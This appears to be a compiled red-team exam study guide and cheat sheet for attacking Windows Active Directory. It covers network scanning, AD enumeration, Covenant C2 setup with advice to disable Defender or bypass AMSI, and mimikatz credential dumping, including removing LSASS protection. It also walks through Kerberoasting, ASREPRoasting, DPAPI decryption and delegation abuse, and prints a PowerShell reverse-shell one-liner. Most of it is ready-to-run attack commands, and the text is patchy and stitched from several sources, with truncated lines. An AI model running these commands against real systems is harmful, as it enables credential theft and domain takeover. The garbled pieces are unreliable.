Sumário .............................................................................................................................. 2 Exam Info 3
Laboratory 3
Reconnaissance 5
Initial Access 20
Covenant C2 Setup 21
Covenant Attack – AD 24
Lateral Movement 33
Domain Privilege Escalation 1 39
Domain Persistence 1 51
Payload .NET 62
Cheat Sheet 64
Privilege Escalation 64
Lateral Movement 66
Defense Evasion 67
Credential Dumping 68 alkthrough/
Ping Sweep nmap -sP -oN scan-alive-hosts.txt
nmap -sP,5,100,150 -oN scan-alive-hosts.txt
Default script, All ports, Version + OS Discovery,
TCP scan nmap -sC -A -T4 -oN
nmap-tcp-initial.txt -p-
UDP Scan:
nmap -sU --top-ports 100 -oN nmap-udp-initial.txt Scan a Single Target nmap [target] Scan Multiple Targets nmap [target1, target2, etc]
iL [list.txt]
Scan a Range of Hosts nmap [range of IP addresses] Scan an Entire Subnet nmap [ip address/cdir] Scan Random Hosts nmap -iR [number] Exclude Targets From a Scan nmap [targets] --exclude [targets] Exclude Targets Using a List nmap [targets] --excludefile [list.txt] Perform an Aggresive Scan nmap -A [target] Scan an IPv6 Target nmap -6 [target]
Port Scanning Options Perform a Fast Scan nmap -F [target] Scan Specific Ports nmap -p [port(s)] [target] Scan Ports by Name nmap -p [port name(s)] [target] Scan Ports by Protocol nmap -sU -sT -p U:[ports],T:[ports] [target] Scan All Ports nmap -p 1-65535 [target] Scan Top Ports nmap --top-ports [number] [target] Perform a Sequential Port Scan nmap -r [target]
O --osscan-guess [target] Service Version Detection nmap -sV [target] Troubleshoot Version Scan nmap -sV --version-trace [target] Perform a RPC Scan nmap -sR [target]
Host Discovery The -p switch determines the type of ping to perform.
Nmap Switch | Description |
-PI | ICMP ping |
-Po | No ping |
-PS | SYN ping |
-PT | TCP ping |
Perform a Ping Only Scan nmap -sn [target] Do Not Ping nmap -Pn [target] TCP SYN Ping nmap -PS [target] TCP ACK Ping nmap -PA [target] UDP Ping nmap -PU [target] SCTP INIT Ping nmap -PY [target] ICMP Echo Ping nmap -PE [target]
PP [target] ICMP Address Mask Ping nmap -PM [target] IP Protocol Ping nmap -PO [target] ARP ping nmap -PR [target] Traceroute nmap --traceroute [target] Force Reverse DNS Resolution nmap -R [target] Disable Reverse DNS Resolution nmap -n [target] Alternative DNS Lookup nmap --system-dns [target]
Can specify a single server or multiple. nmap --dns-servers [servers] [target] Create a Host List nmap -sL [targets]
Nmap Switch | Description |
Nmap Switch | Description |
-sV | Enumerates software versions |
Nmap Switch | Description |
-sC | Run all default scripts |
Nmap Switch | Description |
The -t switch determines the speed and stealth performed.
Nmap Switch | Description |
-T0 | Serial, slowest scan |
-T1 | Serial, slow scan |
-T2 | Serial, normal speed scan |
-T3 | Parallel, normal speed scan |
-T4 | Parallel, fast scan |
Not specifying a T value will default to -T3, or normal speed.
Nmap Switch | Description |
nmap -f [target] Specify a Specific MTU nmap --mtu [MTU] [target] Use a Decoy nmap -D RND:[number] [target] Idle Zombie Scan nmap -sI [zombie] [target] Manually Specify a Source Port nmap --source-port [port] [target] Append Random Data
nmap --data-length [size] [target] Randomize Target Scan Order nmap --randomize-hosts [target]
nmap --spoof-mac [MAC|0|vendor] [target] Send Bad Checksums nmap --badsum [target]
Advanced Scanning Functions TCP SYN Scan nmap -sS [target] TCP Connect Scan nmap -sT [target] UDP Scan
nmap -sU [target] TCP NULL Scan nmap -sN [target] TCP FIN Scan nmap -sF [target] Xmas Scan nmap -sA [target] TCP ACK Scan nmap -sA [target] Custom TCP Scan
nmap --scanflags [flags] [target] IP Protocol Scan nmap -sO [target] Send Raw Ethernet Packets nmap --send-eth [target] Send IP Packets nmap --send-ip [target] Timing Options Timing Templates nmap -T[0-5] [target] Set the Packet TTL nmap --ttl [time] [target] Minimum NUmber of Parallel Operations nmap --min-parallelism [number] [target] Maximum Number of Parallel Operations nmap --max-parallelism [number] [target] Minimum Host Group Size nmap --min-hostgroup [number] [targets] Maximum Host Group Size nmap --max-hostgroup [number] [targets] Maximum RTT Timeout
nmap --initial-rtt-timeout [time] [target] Initial RTT Timeout nmap --max-rtt-timeout [TTL] [target] Maximum Number of Retries nmap --max-retries [number] [target] Host Timeout nmap --host-timeout [time] [target] Minimum Scan Delay nmap --scan-delay [time] [target] Maxmimum Scan Delay
nmap --max-scan-delay [time] [target] Minimum Packet Rate
nmap --min-rate [number] [target] Maximum Packet Rate
nmap --max-rate [number] [target] Defeat Reset Rate Limits nmap --defeat-rst-ratelimit [target]
Shellshock nmap -p 80,443 --script=http-shellshock --script-args uri=/cgi-bin/xx.cgi
GitHub - mubix/shellshocker-pocs: Collection of Proof of Concepts and Potential Targets for #ShellShocker
DNS Zone Transfer dig @<dns_server> <domain_name> -t AXFR +nocookie
GitHub - robertdavidgraham/masscan: TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
Build for doing large scale but fast scanning Metasploit Scanning Modules scanner/portscan post/windows/gather/arp_scanner RHOST=<ip_range>
To use a session as a route: post/multi/manage/autoroute
Find known exploit. Usage: searchsploit To copy the exploit script:
searchsploit -m <Output_Location>
To run ADRecon on a domain member host.
PS C:> .\ADRecon.ps1
To run ADRecon on a domain member host as a different user.
PS C:>.\ADRecon.ps1 -DomainController -Credential <domain\username>
To run ADRecon on a non-member host using LDAP.
PS C:>.\ADRecon.ps1 -Protocol LDAP -DomainController -Credential <domain\username>
To run ADRecon with specific modules on a non-member host with RSAT. (Default OutputType is STDOUT with -Collect parameter)
PS C:>.\ADRecon.ps1 -Protocol ADWS -DomainController -Credential <domain\username> -Collect Domain, DomainControllers
To generate the ADRecon-Report.xlsx based on ADRecon output (CSV Files).
PS C:>.\ADRecon.ps1 -GenExcel C:\ADRecon-Report-
When you run ADRecon, a ADRecon-Report- folder will be created which will contain ADRecon-Report.xlsx and CSV-Folder with the raw files.
Using BloodHound
Use the correct collector
- AzureHound for Azure Active Directory
- SharpHound for local Active Directory
- use AzureHound
- Connect-AzureAD
- Connect-AzAccount
- . .\AzureHound.ps1
- use BloodHound pHound.exe
- .\SharpHound.exe -c all -d active.htb --searchforest
- .\SharpHound.exe -c all,GPOLocalGroup # all collection doesn't include GPOLocalGroup by default
- .\SharpHound.exe --CollectionMethod DCOnly # only collect from the DC, doesn't query the computers (more stealthy)
- .\SharpHound.exe -c all --LdapUsername --LdapPassword --JSONFolder
- .\SharpHound.exe -c all --LdapUsername --LdapPassword
--domaincontroller -d active.htb
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp -randomizefilenames --prettyjson --nosavecache --encryptzip -collectallproperties --throttle 10000 --jitter 23 pHound.ps1
- Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
- Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass
- pip install bloodhound
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
- Collect more data for certificates exploitation using Certipy
- certipy find 'corp.local/john:[email protected]' -bloodhound
- certipy find 'corp.local/john:[email protected]' -old-bloodhound
certipy find 'corp.local/john:[email protected]' -vulnerable -hide-admins username user@domain -password Password123
Then import the zip/json files into the Neo4J database and query them.
root@payload$ apt install bloodhound
root@payload$ docker run -p7474:7474 -p7687:7687 -e NEO4J_AUTH=neo4j/bloodhound neo4j
root@payload$ ./bloodhound --no-sandbox
Go to, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
You can add some custom queries like :
- Bloodhound-Custom-Queries from @hausec
- BloodHoundQueries from CompassSecurity
- BloodHound Custom Queries from Exegol - @ShutdownRepo
- Certipy BloodHound Custom Queries from ly4k
Replace the customqueries.json file located
at /home/username/.config/bloodhound/customqueries.json or C:\Users\USERNAME\ AppData\Roaming\BloodHound\customqueries.json.
Using PowerView
- Get Current Domain: Get-NetDomain
- Enum Other Domains: Get-NetDomain -Domain
- Get Domain SID: Get-DomainSID
- Get Domain Policy:
- Get-DomainPolicy
- #Will show us the policy configurations of the Domain about system access or kerberos
- (Get-DomainPolicy)."system access"
(Get-DomainPolicy)."kerberos policy"
- Get Domain Controlers:
- Get-NetDomainController
Get-NetDomainController -Domain
- Enumerate Domain Users:
- Get-NetUser
- Get-NetUser -SamAccountName
- Get-NetUser | select cn
- Get-UserProperty
#Check last password change
- Get-UserProperty -Properties pwdlastset
- #Get a spesific "string" on a user's attribute
- Find-UserField -SearchField Description -SearchTerm "wtver"
- #Enumerate user logged on a machine
- Get-NetLoggedon -ComputerName
- #Enumerate Session Information for a machine
- Get-NetSession -ComputerName
- #Enumerate domain machines of the current/specified domain where specific users are logged into
Find-DomainUserLocation -Domain | Select-Object UserName, SessionFromName
- Enum Domain Computers:
- Get-NetComputer -FullData
- Get-DomainGroup
- #Enumerate Live machines
Get-NetComputer -Ping
- Enum Groups and Group Members:
- Get-NetGroupMember -GroupName "" -Domain
- #Enumerate the members of a specified group of the domain
- Get-DomainGroup -Identity | Select-Object -ExpandProperty Member
- #Returns all GPOs in a domain that modify local group memberships through
Restricted Groups or Group Policy Preferences
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
- Enumerate Shares
- #Enumerate Domain Shares
- Find-DomainShare
- #Enumerate Domain Shares the current user has access
Find-DomainShare -CheckShareAccess
- Enum Group Policies:
- Get-NetGPO
- Get-NetGPO -ComputerName
- Get-NetGPOGroup
- #Get users that are part of a Machine's local Admin group
Find-GPOComputerAdmin -ComputerName
- Enum OUs:
- Get-NetOU -FullData
Get-NetGPO -GPOname
- Enum ACLs:
- Get-ObjectAcl -SamAccountName -ResolveGUIDs
- Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose
- #Search for interesting ACEs
- Invoke-ACLScanner -ResolveGUIDs
- #Check the ACLs associated with a specified path (e.g smb share)
Get-PathAcl -Path "\Path\Of\A\Share"
Enum Domain Trust:
- Get-NetDomainTrust
Get-NetDomainTrust -Domain
- Enum Forest Trust:
- Get-NetForestDomain
- Get-NetForestDomain Forest
- #Domains of Forest Enumeration
- Get-NetForestDomain
- Get-NetForestDomain Forest
- #Map the Trust of the Forest
- Get-NetForestTrust
Get-NetDomainTrust -Forest
- User Hunting:
- #Finds all machines on the current domain where the current user has local admin access
- Find-LocalAdminAccess -Verbose
- #Find local admins on all machines of the domain:
- Invoke-EnumerateLocalAdmin -Verbose
- #Find computers were a Domain Admin OR a specified user has a session
- Invoke-UserHunter
- Invoke-UserHunter -GroupName "RDPUsers"
- Invoke-UserHunter -Stealth
- #Confirming admin access:
Invoke-UserHunter -CheckAccess
❗ Priv Esc to Domain Admin with User Hunting:
I have local admin access on a machine -> A Domain Admin has a session on that
machine -> I steal his token and impersonate him -> Profit!
Using AD Module
- Get Current Domain: Get-ADDomain
- Enum Other Domains: Get-ADDomain -Identity
- Get Domain SID: Get-DomainSID
- Get Domain Controlers:
- Get-ADDomainController
Get-ADDomainController -Identity
- Enumerate Domain Users:
- Get-ADUser -Filter * -Identity -Properties *
- #Get a spesific "string" on a user's attribute
Get-ADUser -Filter 'Description -like "wtver"' -Properties Description | select Name, Description
- Enum Domain Computers:
- Get-ADComputer -Filter * -Properties *
Get-ADGroup -Filter *
- Enum Domain Trust:
- Get-ADTrust -Filter * Get-ADTrust -Identity
- Enum Forest Trust:
- Get-ADForest
- Get-ADForest -Identity
- #Domains of Forest Enumeration
- Enum Local AppLocker Effective Policy:
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Other Interesting Commands
- Find Domain Controllers
- nslookup
- nslookup -type=srv
- nltest /
- Get-ADDomainController -filter * | Select-Object name
- gpresult /r
The Hitchhiker’s Guide To Initial Access
How To: Empire’s Cross Platform Office Macro
OWASP Presentation of Social Engineering - OWASP
USB Drop Attacks: The Danger of “Lost And Found” Thumb Drives
Weaponizing data science for social engineering: Automated E2E spear phishing on Twitter - Defcon 24
Cobalt Strike - Spear Phishing documentation
Cobalt Strike Blog - What's the go-to phishing technique or exploit?
Spear phishing with Cobalt Strike - Raphael Mudge
Macro-less Code Exec in MSWord
Multi-Platform Macro Phishing Payloads
Abusing Microsoft Word Features for Phishing: “subDoc”
Phishing Against Protected View
The PlugBot: Hardware Botnet Research Project
Luckystrike: An Evil Office Document Generator
The Absurdly Underestimated Dangers of CSV Injection
Macroless DOC malware that avoids detection with Yara rule
Phishing between the app whitelists
Executing Metasploit & Empire Payloads from MS Office Document Properties (part 1 of 2) Executing Metasploit & Empire Payloads from MS Office Document Properties (part 2 of 2)
7 Best social Engineering attack
Using Social Engineering Tactics For Big Data Espionage - RSA Conference Europe 2012
Microsoft Office – NTLM Hashes via Frameset
Defense-In-Depth write-up Spear Phishing 101
This is a quick walkthrough on installing Covenant Command & Control (C&C) framework on Kali Linux. I tested this on Kali 2020.3. but this should work for later version updates as well. Let’s get started.
Covenant has a nicely written installation and setup page over here: ..but I hope to summarise what’s needed to get it up and running on Kali Linux in this post.
First, you need to download the .NET Core framework for Linux. At the time of writing the latest version was 3.1. You can find the latest recommended release over here:
**Download .NET Core (Linux, macOS, and Windows)**
I have a 64bit Kali linux. I’ve read some recommendations mentioning to use 64bit bit instead of 32bit Kali when installing Covenant. I downloaded the 64bit version of the .NET SDK package from the .NET Core 3.1 download page. Screenshot below:
Once the tar.gz file is downloaded on to my Kali host, I pretty much followed the instructions from here to extract it and set the relevant environment variables. I’ve detailed the steps I took below for clarity.
Go ahead and run the following to extract the tar.gz file:
mkdir -p $HOME/dotnet && tar zxf dotnet-sdk-3.1.403-linux-x64.tar.gz -C $HOME/dotnet
The above command will extract the contents to your $HOME/dotnet folder as confirmed below:
Now set the environment variables required with the following commands:
export DOTNET_ROOT=$HOME/dotnet export PATH=$PATH:$HOME/dotnet
And you are done setting up the .NET Core framework needed for Covenant. Now, lets move on to installing Covenant itself.
I installed Covenant under my ~/tools folder, so feel free to change the location as you need:
cd ~/toolsgit clone --recurse-submodules
The above will download Covenant from Github repository. It will use up about 141Mb of space. Once downloaded:
cd Covenant/Covenant donet build
Running the above command will start building the Covenant project. It built successfully, you should get a message like this:
Now you are ready to run Covenant:
dotnet run
This will start the Covenant web service on TCP port 7443. You can check this via another terminal by running:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0* LISTEN 1650543/Covenant
Now, open up a web browser and point to port 7443 of your Kali host. For example, if your Kali host IP is you should be trying , as an example.
You will get a certificate warning, which you can safely ignore for now and proceed, which will redirect you to /covenantuser/login path. If everything has gone well so far, this should take you to the Covenant initial user registration page as shown below:
Prove a username and password to register an account. Make sure you remember this password or save it securely somewhere.
Once logged in, you will be taken to the /home/index path where the Covenant dashboard will be displayed to you as shown below:
Before we can use the Covenant for red teaming activity, the first thing we need to setup is Listener. Basically covenant Listener is same as the usual listener we have used like netcat or meterpreter. In covenant, stager is called as Grunt. We will talk about it in the next section below. First of all, create the listener at listener menu.
Creating First Listener
- Name: Identifier name for the listener, default is generated value but you can set it as you like
- BindAddress: The ip address listener will bind to
- BindPort: The port listener will bind to
- ConnectAddress & ConnectPort: Address and port that will be used as connect back for the stager.
- HttpProfile: You can leave it default
After we create the listener, it will show in listeners list. For example, I create listener with name First-Listener and type is HTTP.
Start the listener we’ve created before and it will show you the new information in listener like the figure below
Start Listener
Listener Active
We can double-check to make sure if listener is successfully active using this command in terminal:
└─$ sudo netstat -tulpn | grep 'LISTEN.Covenant' 1 ⚙ tcp 0 0 LISTEN 13691/Covenant tcp 0 0* LISTEN 13691/Covenant
Launchers are all in one payload delivery feature that generate, host, and download binaries/script to launch new Grunts
Covenant Launcher
Here is explanation from Covenant wiki:
- Binary — The Binary launcher is used to generate custom binaries that launch a Grunt. This is currently the only launcher that does not rely on a system binary.
- ShellCode — The ShellCode launcher converts a Grunt binary to ShellCode using Donut.
- PowerShell — The PowerShell launcher is used to generate PowerShell code and/or a PowerShell one-liner that launches a Grunt using powershell.exe.
- MSBuild — The MSBuild launcher is used to generate an MSBuild XML file that launches a Grunt using msbuild.exe.
- InstallUtil — The InstallUtil launcher is used to generate an InstallUtil XML file that launches a Grunt using installutil.exe.
- Mshta — The Mshta launcher is used to generate an HTA file and/or a mshta one-liner that launches a Grunt using mshta.exe that relies on DotNetToJScript.
- Regsvr32 — The Regsvr32 launcher is used to generate an SCT file and/or regsvr32 one-liner that launches a Grunt using regsvr32.exe that relies on DotNetToJScript.
- Wmic — The Wmic launcher is used to generate an xsl file and/or wmic one-liner that launches a Grunt using wmic.exethat relies on DotNetToJScript.
- Cscript — The Cscript launcher is used to generate a JScript file a Grunt using cscript.exe that relies on DotNetToJScript.
- Wscript — The Wscript launcher is used to generate a JScript file a Grunt using wscript.exe that relies on DotNetToJScript.
For this article, I will use Powershell Launcher as the example. Don’t forget to disable windows defender or bypass the AMSI first(it will be discuss later).
Create PowerShellLauncher
Choose and customize with your own environment. I suggest that you choose GruntHTTP for the implant template. After that, click generate and it will generate a launcher and encoded launcher for our need.
Generated launcher
We need to test our launcher in our windows box to see how the payload and communication work. Open command prompt and paste the generated launcher.
Powershell launcher
Grunt new connection
As we can see from above picture, our launcher is successfully connect to listener in grunt. This is what look like in grunts
Grunt information
We can interact with the victim machine using covenant interact feature in grunt
Grunt interaction
Covenant also support GUI file browser
Grunt file browser
I think that’s all for the getting started article about Covenant C2. Will talk about the more covenant feature in the next article.
If you like this article, please share it and feedback are always welcome.
- Windows Privilege Escalation CheatSheet Cheat Sheet for Windows Local Privilege Escalations
- Juicy Potato Abuse SeImpersonate or SeAssignPrimaryToken Privileges for System Impersonation
Works only until Windows Server 2016 and Windows 10 until patch 1803
- Lovely Potato Automated Juicy Potato
Works only until Windows Server 2016 and Windows 10 until patch 1803
- PrintSpoofer Exploit the PrinterBug for System Impersonation
Works for Windows Server 2019 and Windows 10 • RoguePotato Upgraded Juicy Potato
Works for Windows Server 2019 and Windows 10
- PowerUp Misconfiguration Abuse
- BeRoot General Priv Esc Enumeration Tool
- Privesc General Priv Esc Enumeration Tool
- FullPowers Restore A Service Account's Privileges
#Enable PowerShell Remoting on current Machine (Needs Admin Access)
#Entering or Starting a new PSSession (Needs Admin Access)
$sess = New-PSSession -ComputerName
Enter-PSSession -ComputerName OR -Sessions
$SecPassword = ConvertTo-SecureString '' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local<WtverUser>', $SecPassword)
Invoke-Command -ComputerName -Credential $Cred -ScriptBlock {whoami}
#Execute the command and start a session
Invoke-Command -Credential $cred -ComputerName -FilePath c:\FilePath\file.ps1 -Session $sess
#Interact with the session
Enter-PSSession -Session $sess
#Create a new session
$sess = New-PSSession -ComputerName
#Execute command on the session
Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process}
#Check the result of the command to confirm we have an interactive session
Invoke-Command -Session $sess -ScriptBlock {$ps}
#The commands are in cobalt strike format!
#Dump LSASS:
mimikatz privilege::debug mimikatz token::elevate mimikatz sekurlsa::logonpasswords
#(Over) Pass The Hash mimikatz privilege::debug mimikatz sekurlsa::pth /user: /ntlm:<> /domain:
#List all available kerberos tickets in memory mimikatz sekurlsa::tickets
#Dump local Terminal Services credentials mimikatz sekurlsa::tspkg
#Dump and save LSASS in a file mimikatz sekurlsa::minidump c:\temp\lsass.dmp
#List cached MasterKeys mimikatz sekurlsa::dpapi
#List local Kerberos AES Keys mimikatz sekurlsa::ekeys
#Dump SAM Database mimikatz lsadump::sam
#Dump SECRETS Database mimikatz lsadump::secrets
#Inject and dump the Domain Controler's Credentials
mimikatz privilege::debug mimikatz token::elevate mimikatz lsadump::lsa /inject
#Dump the Domain's Credentials without touching DC's LSASS and also remotely mimikatz lsadump::dcsync /domain: /all
#List and Dump local kerberos credentials mimikatz kerberos::list /dump
#Pass The Ticket mimikatz kerberos::ptt
#List TS/RDP sessions mimikatz ts::sessions
#List Vault credentials mimikatz vault::list
❗ What if mimikatz fails to dump credentials because of LSA Protection controls ?
- LSA as a Protected Process (Kernel Land Bypass)
- #Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
- reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
- #Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe
- #Now lets import the mimidriver.sys to the system
- mimikatz # !+
- #Now lets remove the protection flags from lsass.exe process
- mimikatz # !processprotect /process:lsass.exe /remove
- #Finally run the logonpasswords function to dump lsass mimikatz # sekurlsa::logonpasswords
- LSA as a Protected Process (Userland "Fileless" Bypass)
- LSA is running as virtualized process (LSAISO) by Credential Guard
- #Check if a process called lsaiso.exe exists on the running processes
- tasklist |findstr lsaiso
- #If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data.
- #Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides
- mimikatz # misc::memssp
#Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
- Execute commands or scriptblocks
Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content <list_of_servers>)
- Execute scripts from files
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content
- Execute locally loaded function on the remote machines
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content
<list_of_servers>) -ArgumentList
- A function call within the script is used
Invoke-Command -Filepath C:\path\Get-PassHashes.ps1 -ComputerName (Get-Content
"Stateful" commands using Invoke-Command
$Sess = New-PSSession -Computername Server1
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}
- Dump credentials on a local machine
Invoke-Mimikatz -DumpCreds
- Dump credentials on multiple remote machines
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")
- Over pass the hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:lab.domain.local
/ntlm: /run:powershell.exe"'
- Invoke Mimikatz to create a token from user
$sess = New-PSSession -ComputerName target.domain.local
Enter-PSSession $sess # EP BYPASS + AMSI BYPASS
Invoke-Command -FilePath .\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession $sess
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
netsh interface portproxy add v4tov4 listenaddress= listenport=8080 connectaddress= connectport=8080
netsh interface portproxy show all
You are logged in to ServerA.
- From ServerA, you start a remote PowerShell session to connect to ServerB.
- A command you run on ServerB via your PowerShell Remoting session attempts to access a resource on ServerC.
Access to the resource on ServerC is denied, because the credentials you used to create the PowerShell Remoting session are not passed from ServerB to ServerC.
Cannot encapsulate multiple psremoting session. Delegation not available.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:bob /domain:DOMAIN.LOCAL /ntlm:00000000000000000000000000000000 /run:powershell.exe"'
$servera = New-PSSession -ComputerName SERVERA.DOMAIN.LOCAL
Enter-PSSession -Session $servera
$SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\alice', $SecPassword)
$serverb = New-PSSession -ComputerName SERVERB.DOMAIN.LOCAL -Credential $Cred
Invoke-Command -ScriptBlock { & '\\c$\Users\jack\desktop\Rubeus.exe' klist} -
Session $serverb | Select-String -Pattern Username
Invoke-Command -ScriptBlock { & '\\c$\Users\jack\desktop\Rubeus.exe' dump
/user:targetadmin} -Session $serverb
Invoke-Command -ScriptBlock {& '\\c$\Users\jack\desktop\Rubeus.exe' ptt
/ticket:B64 } -Session $serverb
Invoke-Command -ScriptBlock { ls \serverc\c$ } -Session $serverb
Invoke-Command -ScriptBlock {Invoke-Command -ScriptBlock {hostname} -ComputerName
SERVERC.DOMAIN.LOCAL} -Session $serverb
Invoke-Command -ScriptBlock {Invoke-Command -ScriptBlock {$client = New-Object
System.Net.Sockets.TCPClient("servera",8080);$stream = $client.GetStream();[byte[]]$bytes =
0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (NewObject -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data
2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte =
$stream.Flush()};$client.Close()} -ComputerName SERVERC.DOMAIN.LOCAL} -Session $serverb
All standard domain users can request a copy of all service accounts along with their correlating password hashes, so we can ask a TGS for any SPN that is bound to a "user" account, extract the encrypted blob that was encrypted using the user's password and bruteforce it offline.
- PowerView:
- #Get User Accounts that are used as Service Accounts
Get-NetUser -SPN
- #Get every available SPN account, request a TGS and dump its hash
- #Requesting the TGS for a single account:
- #Export all tickets using Mimikatz
Invoke-Mimikatz -Command '"kerberos::list /export"'
- AD Module:
- #Get User Accounts that are used as Service Accounts
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName Impacket:
- python /: -outputfile
- #Kerberoasting and outputing on a file with a spesific format
Rubeus.exe kerberoast /outfile: /domain:
- #Kerberoasting whle being "OPSEC" safe, essentially while not try to roast AES enabled accounts
Rubeus.exe kerberoast /outfile: /domain: /rc4opsec
- #Kerberoast AES enabled accounts
Rubeus.exe kerberoast /outfile: /domain: /aes
- #Kerberoast spesific user account
Rubeus.exe kerberoast /outfile: /domain: /user: /simple
- #Kerberoast by specifying the authentication credentials
Rubeus.exe kerberoast /outfile: /domain: /creduser: /credpassword:
If a domain user account do not require kerberos preauthentication, we can request a valid TGT for this account without even having domain credentials, extract the encrypted blob and bruteforce it offline.
- PowerView: Get-DomainUser -PreauthNotRequired -Verbose
- AD Module: Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
Forcefully Disable Kerberos Preauth on an account i have Write Permissions or more! Check for interesting permissions on accounts:
Hint: We add a filter e.g. RDPUsers to get "User Accounts" not Machine Accounts, because Machine Account hashes are not crackable!
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
Disable Kerberos Preauth:
Set-DomainObject -Identity -XOR @{useraccountcontrol=4194304} -Verbose
Check if the value changed:
Get-DomainUser -PreauthNotRequired -Verbose
- And finally execute the attack using the ASREPRoast tool.
- #Get a spesific Accounts hash:
- Get-ASREPHash -UserName -Verbose
- #Get any ASREPRoastable Users hashes:
Invoke-ASREPRoast -Verbose
- Using Rubeus:
- #Trying the attack for all domain users
- Rubeus.exe asreproast /format:<hashcat|john> /domain: /outfile:
- #ASREPRoast spesific user
- Rubeus.exe asreproast /user: /format:<hashcat|john>
/domain: /outfile:
- #ASREPRoast users of a spesific OU (Organization Unit)
Rubeus.exe asreproast /ou: /format:<hashcat|john> /domain:
- Using Impacket:
- #Trying the attack for the specified users on the file python <domain_name>/ -usersfile <users_file> -outputfile
If we have harvest some passwords by compromising a user account, we can use this method to try and exploit password reuse on other domain accounts.
WUT IS DIS ?: If we have enough permissions -> GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its blob and bruteforce it.
- PowerView:
- #Check for interesting permissions on accounts:
- Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
- #Check if current user has already an SPN setted:
- Get-DomainUser -Identity | select serviceprincipalname
- #Force set the SPN on the account:
Set-DomainObject -Set @{serviceprincipalname='ops/whatever1'}
- AD Module:
- #Check if current user has already an SPN setted
- Get-ADUser -Identity -Properties ServicePrincipalName | select ServicePrincipalName
- #Force set the SPN on the account:
Set-ADUser -Identiny -ServicePrincipalNames @{Add='ops/whatever1'}
Finally use any tool from before to grab the hash and kerberoast it!
If you have local administrator access on a machine try to list shadow copies, it's an easy way for Domain Escalation.
#List shadow copies using vssadmin (Needs Admnistrator Access) vssadmin list shadows
#List shadow copies using diskshadow diskshadow list shadows all
#Make a symlink to the shadow copy and access it mklink /d c:\shadowcopy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
- You can dump the backuped SAM database and harvest credentials.
- Look for DPAPI stored creds and decrypt them.
- Access backuped sensitive files.
Usually encrypted credentials are stored in:
- %appdata%\Microsoft\Credentials
- %localappdata%\Microsoft\Credentials
#By using the cred function of mimikatz we can enumerate the cred object and get information about it:
dpapi::cred /in:"%appdata%\Microsoft\Credentials<CredHash>"
#From the previous command we are interested to the "guidMasterKey" parameter, that tells us which masterkey was used to encrypt the credential
#Lets enumerate the Master Key:
dpapi::masterkey /in:"%appdata%\Microsoft\Protect<usersid><MasterKeyGUID>"
#Now if we are on the context of the user (or system) that the credential belogs to, we can use the /rpc flag to pass the decryption of the masterkey to the domain controler:
dpapi::masterkey /in:"%appdata%\Microsoft\Protect<usersid><MasterKeyGUID>" /rpc
#We now have the masterkey in our local cache:
#Finally we can decrypt the credential using the cached masterkey: dpapi::cred /in:"%appdata%\Microsoft\Credentials<CredHash>"
Detailed Article: DPAPI all the things
WUT IS DIS ?: If we have Administrative access on a machine that has Unconstrained Delegation enabled, we can wait for a high value target or DA to connect to it, steal his TGT then ptt and impersonate him!
Using PowerView:
#Discover domain joined computers that have Unconstrained Delegation enabled
Get-NetComputer -UnConstrained
#List tickets and check if a DA or some High Value target has stored its TGT
Invoke-Mimikatz -Command '"sekurlsa::tickets"'
#Command to monitor any incoming sessions on our compromised server
Invoke-UserHunter -ComputerName -Poll
-UserName -Delay
#Dump the tickets to disk:
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
#Impersonate the user using ptt attack:
Invoke-Mimikatz -Command '"kerberos::ptt "'
Note: We can also use Rubeus!
Using PowerView and Kekeo:
#Enumerate Users and Computers with constrained delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
#If we have a user that has Constrained delegation, we ask for a valid tgt of this user using kekeo tgt::ask /user: /domain:<Domain's FQDN> /rc4:
#Then using the TGT we have ask a TGS for a Service this user has Access to through constrained delegation
